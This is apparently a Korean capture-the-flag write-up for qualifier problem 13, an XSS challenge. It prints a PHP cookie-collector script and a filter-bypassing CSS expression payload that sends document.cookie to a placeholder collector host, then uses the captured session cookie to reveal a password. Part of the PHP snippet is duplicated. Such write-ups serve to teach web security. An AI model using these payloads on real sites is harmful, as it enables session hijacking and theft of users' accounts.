○ 예선전 13번 문제
■ 예선전 13번 문제 화면
■ Write 페이지로 이동된 화면
문제 소스 :
invalid-file
■ 문제 풀이 화면
해당 문제는 힌트에서도 나왔지만 XSS 관련 문제로 타사용자의 세션을 획득하라는 의미로 파악된다. 먼저 쿠키를 수집하기 위한 사이트를 만들어야 해당 페이지에서는 script 입력을 차단하기 위해서 몇몇 단어를 필터링 하고 있어서 해당 필터링 또한 위해를 해야한다.
→ 쿠키 저장 로직 cookie.php
<?
$fp=fopen("cookie.txt", "a++");
fputs($fp, "cookie : $cook\n");
fclose($fp);
?>
$fp=fopen("cookie.txt", "a++");
fputs($fp, "cookie : $cook\n");
fclose($fp);
?>
→ 필터링 우회 코드
<div style="width:expression(eval('locat'+'ion').href('http://url/cookie.php?cook='+document.cookie));">
→ 획득된 쿠키
→ 쿠키를 설정하면 메인 페이지에서 패스워드 나타남
